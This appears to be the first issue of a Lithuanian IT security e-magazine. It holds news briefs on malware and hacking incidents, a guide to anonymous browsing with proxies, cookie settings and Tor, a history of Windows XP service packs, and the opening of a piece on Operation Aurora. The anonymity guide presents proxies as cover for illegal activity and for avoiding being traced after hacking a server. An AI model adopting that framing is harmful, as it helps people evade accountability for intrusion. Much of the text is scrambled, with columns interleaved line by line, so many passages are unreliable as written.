Page 1


Brangūs skaitytojai, Jaučiu nenumaldomą norą išleisti, galbūt pirmąjį Lietuvoje,

lietuvišką

informacinių

technologijų

saugumo

elektroninį žurnalą. Tačiau išleisdamas šį pirmąjį numerį jaučiu ne tik tą nenumaldomą norą pagaliau įnešti šiek tiek ir savo veiklos į Lietuvos IT saugumo pasaulį, tačiau ir baimę, ir laimę, nes net neįsivaizduoju kaip jūs priimsite šį elektroninio žurnalo numerį. Šiame numeryje aptarsiu kaip išlikti anonimu. Apžvelgsiu vieną iš svarbiausių šių metu atakų, kuri paveikė keliasdešimtis pasaulinio lygio kompanijų. Atsisveikinsime su Windows XP SP2 operacinės sistemos versija ir pasistengsiu apžvelgti kaip blogi (juodųjų skrybelių) vyrukai išnaudoja paieškos sistemas ir kaip jų tinklalapiai pakliūną į aukščiausius rezultatus. Visa tai, ir dar daugiau šiame numeryje. Mėgaukitės, Pagarbiai: A. Zanemunčekovas


Olympus Stylus skaitmeniniame fotoaparate aptiktas virusas Japonijos bendrovė Olympus perspėja savo pirkėjus, kad tie, kurie nusipirko Stylus Tough 6010 skaitmeninį fotoaparatą gali būti užkrėsti virusu. Virusas yra šios kameros atminties kortelėje. Virusas nėra pavojingas iki tol, kol fotoaparatas nėra prijungiamas prie kompiuterio. Kadangi tai automatinės paleisties [autorun] kirmino tipo virusas, kuris plinta, kai automatiškai yra paleidžiamas įrenginys, taigi prijungus šį įrenginį prie kompiuterio yra galimybė užkrėsti kompiuterį. Kitaip sakant naudotojai gali užkrėsti savo kompiuterį tuomet, kai šis fotoaparatas yra prijungiamas prie jo. Jeigu nežinote kaip atpažinti ar jūsų skaitmeninis fotoaparatas yra Olympus Stylus Tough 6010 tipo, jūs galite pasinaudoti toliau pateiktu patarimu. Pagal Olympus bendrovę tik 1700 fotoaparatų yra užkrėsti virusais. Vartotojai gali atskirti savo fotoaparato modelį pagal jo serijinį numerį. Įvedus savo fotoaparato serijinį numerį į Olympus tinkalalapį, gali peržiūrėti ar fotoaparatas yra užkrėstas. Olympus bendrovė labai apgailestauja dėl atsitikusio įvykio ir pažadėjo, kad tokių atsitikimų ateityje daugiau nebepasikartos.

Hakeris nulaužęs Obam`os twitter paskyra išvengė kalėjimo Prancūzų kibernetinis nusikaltėlis išvengė kalėjimo po to, kai nulaužė JAV prezidento, Barack Obama bei kitų įžymybių twitter paskyras. 23 metų Francois Cousteix (Dar žinomas kaip - Hacker-Croll) gavo penkis mėnesius lygtinai po to, kai Prancuzijos teismas pripažino, kad įsilauždamas į Barack Obama, Britney Spears bei Lily Allen twitter paskyras nepadarė jokios žalos. Francois Cousteix advokatas teigė, kad jis įsilaužė į šių asmenų twitter paskyras motyvuodamas tuo, kad norėjo perspėti vartotojus apie duomenų nesaugumą. Cousteix įsilaužė į šių asmenų sąskaitas po to, kai iš viešai prieinamos twitter administratoriaus pateiktų duomenų atspėjo administratoriaus slaptažodį.


HTTPS Everywhere Dvi organizacijos užsiimančios privatumo teisių politika išleido naują įskiepį skirtą firefox interneto naršyklei, kuris užšifruoja interneto naršyklės ryšį. Papildinys pavadintas HTTPS Everywhere vardu nes jis sukuria saugias HTTPS jungtis tarp interneto naršyklės ir šių tinklalapių: 

Google Search;

Wikipedia;

Twitter;

Facebook;

The New York Times;

The Washington Post;

Paypal;

EFF;

Tor;

Ixquick.

Nėra minima ar šis įskiepis galėtų apsaugoti vartotojus nuo kibernetinių nusikaltėlių atakų kurie įsiskverbia į tinklo ryšius. Tiesa, ne visuose anksčiau minėtuose tinklapiuose ryšiai yra šifruojami, nes tuose tinklalapiuose gali būti nesaugus trečiųjų šalių turinys.Būtina pabrėžti, kad tie tinklalapiai, kurių turinys yra iš trečiųjų šalių interneto vardų gali nepalaikyti HTTPS. Jei interneto naršyklėje pasirodys piktograma su perbrauktu brūkšniu tuomet reiškia, kad tinklalapis yra pažeidžiamas ir talpina nesaugų turinį. Įskiepį galima įsidiegti iš https://www.eff.org/files/https-everywhere-latest.xpi

Saulėlydžio fanams gresia virusų atakos Saulėlydžio filmo fanai perspėjami atsargiau naudotis Google paieškos sistema, nes garso takelių, filmo aprašymo ieškojimas gali nuvesti į žalingus tinklalapius kuriuose gresia užsikrėsti virusu. Jei beieškodami informacijos apie saulėlydžio filmą atsidūrėte tinklalapyje kuriame rodomos iššokančios lentelės, perspėjančios apie neva esančius virusus jūsų kompiuteryje, nerekomenduojama spausti jokio klavišo, net norėdami atšaukti nespauskite cancel klavišo. Tokiu atveju į jūsų kompiuterį gali būti įveisiami virusai. Norėdami iš tokio tinklalapio išeiti, vienu metu spustelėkite CTRL + ALT + DELETE klavišų kombinaciją. Atsidarius užduočių vykdymo langui išjunkite naudojama interneto naršyklę. Kibernetiniai nusikaltėliai naudoja Black Hat SEO technika kurios metu Google paieškos sistema


pripompuojama virusuotų tinklalapių iš kurių vartotojams siūloma atsisiųsti netikrą, virusuotą antivirusinę programą. Štai kaip viskas veikia: 

Į paieškos sistemą saulėlydžio sagos fanas įveda užklausą Twilight Eclipse Release Date;

Parodomi aukštai sureitinguoti kenksmingi tinklalapiai ir vartotojas atidaro vieną iš šių tinklalapių;

Pasirodo netikras iššokantis langas, (pop-up) kuris praneša, kad vartotojo sistema yra užkrėsta virusais;

Auka spusteli ant prevent attack mygtuko;

Į aukos kompiuterį atsiunčiama virusuota, netikra antivirusinė programa.

Saulėlydžio filmo fanai turi būti atsargus kai ieško informacijos apie saulėlydžio filmus. Privaloma būti atidžiais net tais atvejais kai atrodo, jog paieškos rezultatai nėra kenksmingi ir visiškai patikimi. Tokios atakos kibernetiniams nusikaltėliams atneša tonus pinigų. FTB vyrukai sučiupo vieną hakerį, kuris iš tokių atakų sugebėjo užsidirbti net 163 milijonus dolerių.

Naujas įrankis geba atskleisti interneto slaptažodžius Rusų kompanija Elcomsoft užsiimanti programinės įrangos gamyba, į dienos šviesą išleido naują slaptažodžių laužimo programą, kuri geba tučtuojau parodyti bei nulaužti Microsoft Internet Explorer, pašto dėžučių, visų versijų Microsoft Outlook Express, Windows Mail ir Windows Live Mail slaptažodžius. Programa vadinasi Elcomsoft Internet Password Breaker ir kaip, kad skelbia jos gamintojai, ši programa skirta saugumo pareigūnams, baudžiamųjų bylų tyrėjams ir valdžios institucijoms, kurie galėtų naudotis ekspertizės metu. Pareigūnai galėtų iš karto pamatyti bei nulaužti slaptažodžius, saugomus kompiuteryje. Elcomsoft Internet Password Breaker programa kainuoja viso labo 49$. Iš tokios žemos kainos galima spręsti, kad ši programa nėra skirta vien tik vyriausybinėms organizacijoms bei saugumo pareigūnams...


Tai reiškia, kad bet kas galėtų naudotis šia programa ir nulaužti slaptažodžius, net nereikalaujant didelių techninių žinių. Ši slaptažodžių laužimo programa vartotojams suteikia galimybę iš įvairių resursų gauti prisijungimo vardą bei slaptažodį. Programa gali greitai sugaudyti tinklalapiuose, formose, automatiškai įvedamoje informacijoje įvestus slaptažodžius. Elcomsoft Internet Password Breaker geba automatiškai atpažinti visas palaikomas programas, geba surasti visus varotojus ir .PST failus ir iš jų išgauti saugomus slaptažodžius. Jei į dienos šviesą išleidžiamos programos, kurios geba vos keliais mygtukų spustelėjimais nulaužti slaptažodžius ir tokios net nekainuoja 100$, tuomet visoms organizacijoms bei asmeninių kompiuterių vartotojams reiktų susirūpinti savo saugumu. Siūlyčiau pradėti šifruoti visą kietajį diską  .


Kiekvieną

kartą,

kai

komentuojate

reikiamus failus). Kartais serveriui būtina pateikti

tinklalapyje, atsisiunčiate failą iš FTP serverio,

informaciją apie operacinės sistemos versiją,

netgi perskaitote straipsnį ar pasižiūrite varžybų

interneto naršyklės nustatymus tam, kad serveris

rezultatu, jūs paliekate savo pėdsakus, įrašus apie

žinotų, kurį tinklalapio puslapį pateikti klientui.

jūsų asmeninę informaciją. Šiuose įrašuose esanti informacija pasiekiama tinklalapių, serverių administratorių. Iš paliktų įrašų administratoriai gali nuspręsti jūsų IP adresą, kompiuterio ID vardą, kokiame tinklalapyje prieš tai lankėtės, netgi jūsų fizinę buvimo vietą, bei

Yra skirtingų tinklalapio puslapių, skirtingoms

interneto tiekėjų informaciją, su daugiau ar mažiau

interneto naršyklėms. Tačiau paprastai interneto

pateikta informacija. Taip pat įmanoma peržvelgti

tinklalapiai nepriklauso nuo interneto naršyklės

jūsų naudojamą ekrano rezoliuciją, operacinę

nustatymų, todėl verta slėpti šia informaciją.

sistemą ir t.t.. Jeigu

Ką serveris gauna iš interneto naršyklės ? kas

nors

norėtų

surinkti

konfidencialią informaciją apie jus, jis tūrėtų pilnas galimybes. Tačiau

jūs

neprivalote

visiems

pateikti

Proxy serveriai yra pirma jūsų gynybos

sistemos

pavadinimą

bei

versiją; 

Interneto naršyklės pavadinimą bei versiją;

Interneto naršyklės nustatymus (rezoliucija,

informacijos apie save.

Proxy serveriai

Operacinės

java / javascript, flash palaikymus ir t.t. ...) 

Kliento IP adresą;

Kitą informaciją.

linija, taigi pradėkime nuo jos. Informacija tarp

Pati svarbiausia informacija, kurios reikia interneto

kliento ir serverio apsikeičiama kliento – serverio

serveriui, yra informacija apie IP adresus.

modeliu. Klientas nusiunčia užklausa (kokio failo

Panaudojant jūsų IP adresą galima nustatyti iš

reikia) ir serveris atsiunčia atsakymą į užklausą (į

kurios šalies, kurio miesto esate, jūsų interneto


tiekėją, jūsų fizinį buvimo vietos adresą.

HTTP_ACCEPT_LANGUAGE; -

Kintamasis nurodo

Kiekvienas informacijos vienetas yra tam tikros

kuri interneto naršyklės kalba yra naudojama

vertės rodiklis. Jeigu informacijos vienetas yra

(kuria kalba atvaizduoti tinklalapį).

serveriui

HTTP_USER_AGENT;

neperduodamas,

tada

atitinkamas

kintamasis bus tuščias (jo vertė nebus nustatyta).

interneto

Kliento

operacinę sistemą.

informacija

nustatoma

keliais

kintamaisiais: Kliento

-

IP

pavadinimą,

versiją

bei

- Tinklo serverio vardas.

Tai tik maža kintamųjų dalis, kuri gali

adresas;

parodyti asmeninę vartotojo informaciją. Iš tiesų jų

$_SERVER['HTTP_VIA'];

tuščias

naršyklės

HTTP_HOST;

$_SERVER['REMOTE_ADDR'];

- Kintamasis parodo kliento

tuomet

- Jei šis kintamasis nėra

naudojamas

proxy

yra kur kas daugiau (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING,

serveris.

HTTP_CACHE_CONTROL,

Kintamasis nustato proxy serverio (ar serverių)

SERVER_ADDR,

adresus; HTTP_X_FORWARDED_FOR;

HTTP_CONNECTION,

SERVER_SOFTWARE,

SERVER_PROTOCOL, ...).

- Jei šis kintamasis nėra

tuščias tuomet yra naudojamas proxy serveris. Šis kintamasis saugo kliento realų IP adresą.

REMOTE_ADDR = 66.90.73.223 HTTP_ACCEPT_LANGUAGE = US HTTP_USER_AGENT

=

Opera/9.80

(Windows

NT

5.1;

U;

en)

Presto/2.5.24 Version/10.54 HTTP_HOST = www.webserver.ru

HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7) HTTP_X_FORWARDED_FOR = 194.115.5.5

Ši informacija gali būti naudojama įvairių hakerių, kurie nori užkėsti jūsų kompiuterį virusu.

informaciją,

leidžiant

anonimiškai

naršyti

internete.

Taip pat surinktais jūsų pėdsakais naudojasi įvairios

Proxy serveriai tarp mašinos ir interneto

reklamos kompanijos, kurios seka jūsų aktyvumą

užtikrina papildoma tarpininkavimo sluoksnį. Šių

internete. Vėliau iš tokių kompanijų sulaukiate

sluoksnių yra kelių tipų, tačiau web proxies ir

šlamšto laiškų.

Socks proxies yra svarbiausi. įvairių

HTTP proxy šie proxy serveriai perduoda

reklamos agentūrų, bei norint nuslėpti savo pėdsakus

tik http protokolo duomenis, tad tinka tik WEB

internete geriausia naudoti proxy serverius, kurie geba

tinklalapiams naršyti.

Norint

apsisaugoti

paslėpti jūsų paliekamą

nuo

hakerių,

Socks proxy tai proxy perduodantys ne tik


http, bet ir kitų protokolų duomenis. Šie proxy gali

Taip pat išlieka galimybė, kad galbūt šiuos

būti jungiami į proxy serverių grandinę. Socks proxy

serverius kuruoja dideli, pikti dėdės su FBI

dažniausiai nėra prieinami viešam naudojimui.

ženkliukais...

WEB proxy, šie proxy serveriai veikia per

Interneto paslaugų proxy serveriai:

interneto tinklalapį. Web serveryje paleidžiamas tam

http://www.hidemyass.com/;

tikras PHP arba ASP skriptas (scenarijus), kuris ir

http://proxy.uzeik.net/;

atlieka proxy serverio vaidmenį. Tokie proxy turi

http://anonymouse.org/anonwww.html;

daug trūkumų, dažniausiai neleidžia perduoti formų

http://www.megaproxy.com/freesurf/;

duomenų, blokuoja javascript skriptus, nesupranta

http://www.surf-anon.com/;

rėmelių, atidaro papildomus langus ir rodo įvairias

http://proxify.co.uk/;

http://turbohide.com/ ;

Ir t.t..

reklamas.

Žinomiausi

skriptai

-

PHPproxy

ir

CGIproxy. Proxy serverių naudojimas Yra du skirtingi proxy serverių naudojimo metodai ir kiekvienas iš jų turi savų pliusų bei minusų. Pirmas metodas – naudotis interneto paslaugų proxy

serveriais.

Tokios

sistemos

pagrindinė

sudedamoji dalis yra langas. Šiame lange įvedate tos interneto svetainės adresą, kurią norite aplankyti. Kiekvieną kartą aplankant skirtingus tinklalapius, reikia į tokios sistemos pagrindinį langą įvedinėti norima aplankyti tinklalapį. Kai įvedate tinklalapio adresą ir spustelėjate submit, surf anonymous, hide my ass, go mygtuką prieš pat duomenų siuntimą, jūsų visa asmeninė informacija užšifruojama. Tokiu būdu galite anonimiškai naršyti po įvairius tinklalapius bei atlikti kitą neteisėtą veiklą. Tačiau nereikia pamiršti, kad atliekant juodus darbus, jūs naudojatės interneto paslaugų proxy serveriais dar nereiškia, kad jūsų nesuseks. Nulaužto serverio, tinklalapio administratorius gali kreiptis į tuos serverius kuruojančius administratorius ir gali paprašyti pateikti jų žurnalo įrašus (logus).

Vienas iš pagrindinių veiksnių, trukdančių naudotis interneto paslaugų proxy serveriais, tai, kad kiekvieną kartą norėdami anonimiškai naršyti, jūs turite aplankyti šio tiekėjo namų puslapį. Galima proxy serverių tinklalapį nusistatyti kaip namų

puslapį

tačiau,

pripažinkite,

vistiek

nepatogu. Taip

pat

naudojantis

šių

tiekėjų

paslaugomis ir anonimiškai naršant po tinklalapius matote erzinančias reklamas, kurios automatiškai įterpiamos į aplankomus tinklalapius. Juk turi jie kaip nors išlaikyti savo serverius... Kitas metodas – savo privatumą galite apsaugoti tinkamai susikonfigūravus interneto naršyklę, kuri leistų anonimiškai naršyti, neaplankant tinklalapių.

proxy

jokių Kad

serverių

susikonfigūruotumėte

taip tiekėjų savo

interneto naršyklę jums reikia žinoti proxy serverį ir kokiu prievadu (port`u) jis yra naudojamas. Tokią informaciją galima gauti iš viešai prieinamų proxy serverių sąrašo.


Viešai prieinamų proxy serverių sąrašas:

Kai žinosite proxy serverio vardą bei

http://tools.rosinstrument.com/proxy/;

prievado numerį, interneto naršyklėje pasirinkite

http://proxies.my-proxy.com/;

Tool >> Internet Options. Dabar pasirinkite

http://www.proxylistservice.com/Fresh

Connections followed by Settings ir pažymėkite

AnonymousProxyLists/Public%20Proxy%20List.h

use a proxy server. Viskas, kas jums liko padaryti,

tml;

tai įvesti proxy serverio adresą į adresų laukelį ir

http://www.echolink.org/proxylist.jsp;

prievado numerį į port lauką.

http://spys.ru/en/;

ir t.t.

Proxy nustatymai Opera naršyklei Settings >> Preferences >> Advanced skirsnis >>

Prieš užslapstinant savo tapatybę yra keletas dalykų, kuriuos jūs turėtumėte žinoti. Nors labai paprasta naudotis proxy serveriais tačiau yra keletas minusų.

Network >> Proxy Servers... >> pažymėkite HTTP ir įveskite proxy serverio adresą bei naudojamą prievadą >> OK >> OK.

Proxy nustatymai Firefox naršyklei

serverį naudoti visiems protokolams tuomet

Tools >> Options >> Advanced skirsnis >>

pažymėkitee use this server for all protocol >>

Network paskyra >> Settings >> pasirinkite

OK >> OK .Viešai publikuojamais, nemokamais

Manual Proxy Configuration >> įveskite proxy

proxy serveriais gali naudotis daugelis žmonių,

serverio adresą bei prievado numerį. Jei norite šį

todėl gali suletėti viso proxy serverio darbas ir


automatiškai sulėtės jūsų naršymo greitis. Reikia

Galite eksperimentuoti su viešai pateikiamais

būti įgudusiam ir turėti šiek tiek patirties, jei

proxy serveriais iki tol, kol rasite greitą serverį.

norima surasti patikimą, greitą proxy serverį.

Daug efektyviau būtų surasti patikimus proxy

Proxy programų sąrašas:

serverius. Norint surasti patikimus proxy serverius

Proxy Finder Enterprise [Freeware] ;

galima

Anonymous Guest - Proxy Checker, SOCKS

pasinaudoti

programomis.

tokiam

Interneto

darbui

erdvėje

skirtomis

pilna

tokių

Manager: 4.00 [Freeware] ;

programų ir dauguma iš jų platinamos nemokamai.

Elite Proxy Switcher 1.01 [Shareware] ;

Šios programos tikrina viešus proxy serverius,

Elite Proxy Switcher [133.83 LTL / 47.54

ištestuoja anonimiško naršymo greitį ir rezultatus pateikia

jums.

Šiose

programose

užtenka

USD] . Nors kai kurios programos nėra nemokamos,

spragtelėti vieną mygtuką ir pasirinkti norimą

tačiau

proxy serverį.

įsigytumėte patikima proxy serverių programą

verta

išleisti

keliasdešimt

litų,

kad


Slapukai (Cookies)

paskyra, arba nustatant kliento detales, kurios bus pasiekiamos kitą kartą apsilankius klientui. Jei

Slapukai yra maži tekstiniai failai (dažniausiai

naudojatės bendru kompiuteriu, bet kas gali

mažiau nei 1kb dydžio) kurie sukuriami ir saugomi

aplankyti tą patį tinklalapį ir pasiekti jūsų paskyrą.

standžiajame diske tuo metu, kai aplankote

Tai gana kebli situacija, ypač jei slapukuose

dinaminį ( ar inter-aktyvų) tinklalapį. Šie slapukai

išsaugoma kreditinės kortelės informacija ir kiti

saugo jūsų asmeninę informacija. Slapukuose

konfidencialūs duomenys. Windows XP operacinės

esantys duomenys naudojami tais atvejais, kai

sistemos slapukai saugomi

neįvedinėjant jokių slaptažodžių norima pasiekti vartotojo

c:\documents and Settings\Administrator\Cookies Apsilankius šioje direktorijoje lengvai atpažinsite

ištrinti per interneto naršyklės nustatymus. Per čia

slapukus. Tačiau, jei tikrai stengiatės rasti visus

galite valdyti visus Opera naršyklės slapukus.

slapukus ir niekaip nepavyksta, galite slapukus


Slapūkų valdymas Opera naršyklėje Opera >> Settings >> Preferences.. >> Advanced skirsnis

>>

Cookies

>>

Manage

Cookies

mygtukas.

Skirsnis dalyje galite pasirinkti, kad jokie slapukai nebus saugomi (never accept cookies) arba uždarant Opera interneto naršyklę ištrinti visus įrašytus slapukus, (delete new cookies when exiting Opera) ar kiekvieną kartą klaustų ar norite įrašyti slapuką (ask me before accepting Cookies).

Slapūkų valdymas Firefox naršyklėje Tools >> Options >> Privacy skirsnis >>

Jeigu norite, kad slapukai nebūtų saugomi, iš išsiskleidžiamojo

sąrašo

pasirinkite

never

remember history.

Iš išsiskleidžiamojo sąrašo (ties firefox will.. )

Ištrinti slapukus galite su tokiomis nemokamomis

pasirinkite >> use costum settings for history >>

programomis kaip:

spustelėkite show cookies... mygtuką.

 CCleaner,(http://www.piriform.com/download );  Wipe,(http://privacyroot.com/software/WIPEdownload.php ).


Tai reiškia, kad jums dalyvaujant Tor tinkle, per

Tor projektas

jūsų kompiuterį taip pat kažkas galės naršyti

Tor - vienintelis nemokamas tokio lygio

internetą, bus fiksuojamas jūsų IP, nors internautas

proxy servisas, užtikrinantis aukštą anonimiškumo

gali būti Antarktidoje. Tor tinkle atsekti tikrąjį IP

lygį, paprastumą ir patogumą.

adresą yra praktiškai neįmanoma, nes šis tinklas

Tor projektas tai -

sujungtas virtualių tunelių

yra labai dinamiškas, o jokie žurnalai nėra vedami.

tinklas, kuris leidžia vartotojams ar vartotojų

Tor tinklai apsaugo jus nuo internete paplitusių

grupėms

formų kurios stebi jūsų aktyvumą.

virtualioje

erdvėje

užtikrinti

savo

privatumą ir saugumą.

Idėja paprasta – naudojant sunkiai susekamus

Tor projektas taip pat leidžia programinės įrangos

maršrutus atsikratyti tais, kurie bando sekti /

kūrėjams kurti naujas komunikacijos priemones su

stebėti jūsų aktyvumą ir periodiškai trinti jūsų

integruotomis privatumo nuostatomis.

paliktus pėdsakus. Vietoj to, kad nuo šaltinio būtų

Tor leidžia organizacijoms ir asmenims, per

parenkamas tiesioginis kelias, per tor tinklą

viešuosius

informacija

duomenų paketai keliauja atsitiktiniais keliais. Jie

nepažeidžiant jų privatumo ribos. Tor tinklo širdis

keliauja per kelis skirtingus ryšius, kurie slepia

yra

vartotojų

serveriai.

tinklus,

keistis

kompiuteriuose

esantys

proxy

jūsų paliktus pėdsakus.


Taip nei vienas stebėtojas negalės pasakyti iš kur

Kiekviena ryšiu grandinė tik žino iš kur gavo

duomenis atėjo ir kur jie keliaus. Norėdami sukurti

informacija ir kam ją atiduoti. Kiekviena ryšio

privataus tinklo kelia su Tor, tarp vartojo

grandinė

programinės

užtikrinta, jog niekas negalėtų stebėti ar sekti jūsų

įrangos

ar

kliento

palaipsniui

sukuriama užšifruotų ryšių grandinė.

yra

užšifruojama

tam,

kad

būtų

siunčiamų / gaunamų duomenų.

Kai užšifruotų ryšių grandinė sukuriama,

Tor tinklai veikia tik TCP srautu ir gali būti

tuomet galima keistis bet kokio tipo duomenimis.

naudojama kartu su SOCKS. Siekiant didesnio

Kadangi kiekviena užšifruota ryšių grandinė saugo

veiksmingumo, Tor programinė įranga naudoja tą

tik tuos duomenis, kurie reikalingi nustatyti iš kur

pačia grandinę tik 10 minučių. Praėjus 10 minučių

buvo gauti duomenys ir kur turi būti siunčiami,

sukuriama nauja grandinė tam, kad vartotojas būtų

taip niekas negali jūsų susekti.

atribotas nuo ankstesnių jo veiksmų.


Tor tinklai geba nuo įvairių tarnybų paslėpti savo

Tor tinklai geba apsaugoti tik tinkle keliaujančius

buvimo vietą. Tor vartotojai gali, neatskleidžiant

duomenis.

savo tinklo ypatybės,

Atsisiųsti

prisijungti prie įvairių

tarnybų. Verta įsidėmėti, kad Tor tinklai negali išspręsti visų anonimiškumo problemų.

Tor programinę įranga galite iš

http://www.torproject.org/easy-download.html.en


Tikriausiai jau žinote, o jei nežinote skubu

Windows XP SP analizė

jums pranešti, kad nuo 2010m. liepos 13 d. Microsoft bendrovė nebepalaiko Windows XP SP2

Microsoft pradėjo leisti servisų paketus,

operacinės sistemos [toliau – OS] versijos. Regis

siekdamas pataisyti ir pridėti naujų ypatybių

Microsoft`as ėmėsi ryžtingų veiksmų.

Windows

šeimos

operacinėms

sistemoms.

Paanalizuokime šia situacija pesimistišku

Kiekvienas servisų paketas tai visų, ankstesnių

požiūriu. Kadangi Microsoft daugiau nebeteiks

paketų superpaketas , todėl pakanka įdiegi išleistą

ir

vėliausią paketą ir visi ankstesni paketai bus įdiegti

Windows 2000 OS tai reiškia, kad netiesiogiai

kartu. Tačiau, jei dar turite Win XP be jokių įdiegtų

vartotojus verčia atsisiųsti arba SP3 atnaujinimą

servisų paketų, jums reiktų pirmiausia įdiegti SP1

(kuris yra nemokamas TIK verslo sektoriuje) arba

paketą ar SP2 paketą, kad galėtumėte įdiegti SP3.

saugumo

atnaujinimų

Windows

XP

SP2

pirkti / diegti naujesnę windozę iš ko Microsoft

Service Pack 1

tikrai pasidarys pelno, vien tik dėl to, kad verslo sektoriuje ir namų vartotojų rinkoje daugiau nei

Pirmasis servisų paketas (SP1), skirtas

pusę vartotojų, kurie naudojasi Windows OS,

Windows XP OS buvo išleistas 2002m. rugsėjo 9d.

naudoja būtent Windows XP SP2.

Šis servisų paketas turi vienus iš svarbiausių

Optimistiškas požiūris. Microsoft suskubo

saugumo

spragų

pataisymų,

atnaujinimų,

rūpintis mūsų, paprastų vartotojų bei įmonių

suderinamumų,

saugumu todėl ir nutraukė Windows XP SP2

palaikymą. Šios bibliotekos Win XP OS leidžia

palaikymą.

atpažinti planšetinius kompiuterius (Tablet Pc) bei

NET

Framework

bibliotekų

Tikriausiai įdomu kodėl būtent Windows

naują Windows Messenger 4.7 versiją. Pati

XP SP2 operacinės sistemos versija, kodėl ne XP

svarbiausia ypatybė atkeliavusi su šiuo servisų

SP1, XP SP2 ar XP SP3. Panagrinėkime išsamiau.

paketu buvo USB 2.0 jungties palaikimas bei Set Program Access and Default programų grupės priėjimas. Per šį komponentą vartotojai gali


kontroliuoti interneto naršyklės ir instant message

antivirusinės programos, Windows atnaujinimus

aktyvumą. Kartu su šiuo paketu palaikoma SATA

bei naujosios Windows ugniasienės.

jungtį turintys standieji diskai, kurie buvo didesni

Center komponente gali būti pridėtos trečiūjų šalių

nei 137Gb (48 bitų LBA palaikymas). Taip pat

antivirusinės programos bei ugniasienės.

šiame pakete yra ir Java virtualios mašinos, bei

Service Pack 2b

IPv6 palaikymas. 2003 m. vasario 3 d. Microsoft išleido pirmojo

servisų paketo a versija. Po įvykusio

teismo su Sun Microsystems

šiuo paketų buvo

panaikintas Microsoft Java virtualios mašinos

Security

2006 m. Rugpjūčio mėnesį Microsoft išleido antrojo servisų paketo b papildymą, kuris atnaujino media įdiegimą (Duomenys imti iš įvairių šaltinių, gali būti netikslumų Aut. Pstb.).

palaikymas.

Service Pack 2c Service Pack 2

2007m. rugpjūčio 10 d. Microsoft paskelbė, kad

Antras servisų paketas skirtas WIN XP OS

išleido vieną iš pagrindinių atnaujinimų, skirtų

(SP2) (kodinis vardas Springboard [Tramplynas])

antrajam servisų paketui. Atnaujinimas pavadintas

buvo išleistas 2004m. rugpjūčio 25 d. Šis servisų

Service Pack 2c (SP2c). Šis atnaujinimas sumažina

paketas pridėjo daug naujų ypatybių.. Su šiuo

Windows XP operacinės sistemos raktų naudojimą.

servisų paketu tapo palaikomas Wi-Fi bei WPA

Atnaujinimas prieinamas tik sistemų kūrėjams.

šifravimas. Internet explorer 6 naršyklėje įdiegta

Service Pack 3

iššokančių langų (pop-up) blokavimo sistema bei Bluetooth

ryšio

palaikymas.

Naujame

pasisveikinimo lange, kuris pasirodo kiekvieną kartą, kai windozė kraunasi buvo ištrintas užrašas "Professional", "Home Edition" ir "Embedded". Žalias krovimosi laukelis Home Edition versijoje ir geltonas laukelis buvo pakeisti mėlynais. Antrasis servisų paketas pridėjo naujas apsaugos priemones. Pagal nutylėjimą pradėta naudoti Windows ugniasienė. Taip pat pridėta duomenų apdorojimo apsauga, kurią anksčiau buvo galima lengvai išnaudoti. OS palaikė NX bitų sistemą, kuri sustabdo įvairias buferio perpildymo atakas. Antrajame

servisų

pakete

atsirado

Windows

Security Center palaikymas kuris parodo visos sistemos apsaugos būseną, įskaitant ir įdiegtos

Windows XP trečiasis servisų paketas buvo išleistas 2008m. balandžio 21d.. Naujos 3 servisų paketo ypatybės: 

Juodųjų maršrutizatorių aptikimas;

Kliento tinklo priėjimo apsauga;

IEEE 802.1X autentifikacijos palaikymas grupėms;

Aprašomi saugumo nustatymai apsaugos grupėms bei vietinei apsaugai;

Atnaujintas

Microsoft

kriptografinio

šifravimo modulis; 

Produkto kodo reikalavimas;

Anksčiau išleisti atnaujinimai;


Atnaujinti IPSec filtrai;

XP SP3 turi visus ankstesnius servisų paketus

MSXML 6.0 SP2 ir XMLLite;

skirtus XP OS. Šis servisų paketas patikrina

Įdiegiama atnaujinta microsoft valdymo

HKLM_LOCAL_MACHINE\\SYSTEM\

kontrolės versija; 

Palaikomas

nuotolinio

darbalaukio

protokolas; 

Atnaujinta tinklo diagnozės įranga;

Atnaujinta WPA2

Įdiegta Windows Script 5.7;

Įdiegta Windows Installer 3.1 v2; Windows XP SP3 gali būti įdiegtas ir

naudojamas 30 dienų, be jokio produkto kodo reikalavimo. Po 30 dienų naudotojas perspėjamas įvesti teisingą servisų paketo kodą ir aktyvuoti įdiegimą.

CurrentControlSet\Control\Windows\

direktorijoje esantį CSDVersion registro raktą. Jei registro raktas yra lygus ar didesnis nei 0x100, tuomet pradedamas atnaujinimo procesas, kitu atveju naudotoją perspėja įdiegti SP1 ar SP2. Kadangi naudotojui paprastai nebegalima atsiųsti SP1 paketo kaip atskiro komponento, jam reikia atsisiųsti šį paketą per automatinį Windows atnaujinimo langą. Taip pat šis servisų paketas turi papildomų atnaujinimų skirtų OS Windows XP Media Center Edition (MC) ir Windows XP Tablet PC Edition komponentams. Su šiuo atnaujinimu iš ScreenSaver

skirtuko

panaikinta

žvaigždutės“ logotipas (Energy Star).

„energijos


Blaster, Nimda, Code Red ir kiti aukšto lygio

ramiai ilsėjosi užsitarnautomis gruodžio mėnesio

kirminai neabejotinai tapo praeities dalimi, jie

atostogomis, kibernetiniai nusikaltėliai siautėjo.

pakeitė elektroninių grėsmių erdvę.

Bet viskas nuo pradžių.

Operacija „Aurora“ dar kartą pakeitė visą

Dmitri

Alperovitc,

McAfee

grėsmių

elektroninų grėsmių erdvę. Ši ataka parodė, kad

viceprezidentas pavadino šia ataka Auroros vardu,

didžiausios kompanijos yra labai pelningi taikiniai.

nes buvo atrasta, kad „Aurora“ pavadinimas tai

Nors „Aurora“ ataka buvo pradėta vykdyti

atakuojančios mašinos bylos kelias, kurioje buvo

dar 2009 metų viduryje ir tesėsi iki 2010 m.

du kenkėjų failai.

Pradžios, tačiau šios atakos užmiršti neįmanoma,

Pagal

McAfee,

pagrindinis

šios

nes šios atakos metu buvo įsilaužtą į daugiau nei

atakos tikslas buvo gauti prieigą prie šių

36 kompanijų, tarp jų ir į tokias kaip – Google ,

atakuojančių

Adobe Systems, Jupiter Networks, Rackspace,

konfidencialius šių bendrovių duomenis. 2010 m.

Yahoo, Symantec, Northon Grumman ir kt.

Sausio 12 dieną Google , savo tinklaraštyje

Operacija kompanijų kibernetiniai

„Aurora“

parodė,

intelektualinės nusikaltėliai

gali

kad

bendrovių

bei

pavogti

siekiant

paskelbė, kad tapo kibernetinių nusikaltėlių auka.

nuosavybės,

Tinklaraštyje taip pat buvo skelbiama, kad daugiau

būti

